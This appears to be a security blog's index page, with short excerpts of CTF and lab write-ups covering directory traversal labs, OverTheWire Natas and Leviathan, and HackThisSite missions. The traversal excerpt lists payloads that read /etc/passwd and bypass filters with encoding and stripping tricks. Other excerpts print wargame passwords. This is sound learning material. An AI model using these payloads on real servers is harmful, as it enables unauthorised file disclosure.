• Directory traversal Attacks
    Web Security Academy Labs
    File path traversal, simple case: `image?filename=../../../etc/passwd` returns `root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin …`
    File path traversal, traversal sequences blocked with absolute path bypass: `image?filename=/etc/passwd`
    File path traversal, traversal sequences stripped non-recursively: `?filename=....//....//....//etc/passwd`
    File path traversal, traversal sequences stripped with superfluous URL-decode: `?filename=..%252f..%252f..%252fetc/passwd` (decodes to `..%2f..%2f..%2fetc/passwd`)
    File path traversal, validation of start of path: `?filename=/var/www/images/../../../etc/passw`
    File path traversal, validation of file extension with null… Read more: Directory traversal Attacks
  • Mr Robot Capture the Flag
  • Over The Wire: Natas Solutions Levels 0-10
    The following is my write-up of solving challenges 0-10 in the Natas wargame presented by overthewire.org. Level 1 Logging in with natas0 / natas0 as the directions say. A pop-up box tells me the password is somewhere on that page. Inspecting the source, I can see the password: gtVrDuiDfck831PqWsLEZy5gyDz1clto Level 2 Viewing the source code I find a link to another file. Navigating to the /file directory I get… Read more: Over The Wire: Natas Solutions Levels 0-10
  • Overthewire: Leviathan Solutions
    The following is a walkthrough of how to solve the Leviathan wargame featured on Overthewire.org. For this wargame, we ssh to port 2223 to access the levels. Passwords for each level reside in the /etc/leviathan_pass directory. Files for each level reside in the /home directory. The username and password are provided for level 0. username: leviathan0 password: leviathan0 Level 0 ssh leviathan0@leviathan.labs.overthewire.org -p 2223 When prompted, enter… Read more: Overthewire: Leviathan Solutions
  • Hackthissite: Javascript Mission Solutions
    Level 1 Challenge: This level is super easy. All you have to do is check the source code for the answer. You will see the following: As we can see, the function check(x) determines if x == cookies; if so, we will get an alert that says ‘win!’. Let’s enter ‘cookies’ as our password. Bingo! Level 2 Challenge: We need to disable JavaScript to complete the mission. You… Read more: Hackthissite: Javascript Mission Solutions